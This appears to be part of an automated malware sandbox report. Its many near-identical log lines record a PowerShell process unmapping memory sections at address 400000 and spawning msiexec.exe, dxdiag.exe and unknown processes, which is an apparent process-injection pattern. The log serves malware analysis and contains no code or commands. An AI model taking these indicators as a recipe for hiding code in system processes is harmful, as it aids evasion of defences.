    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: unknown unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
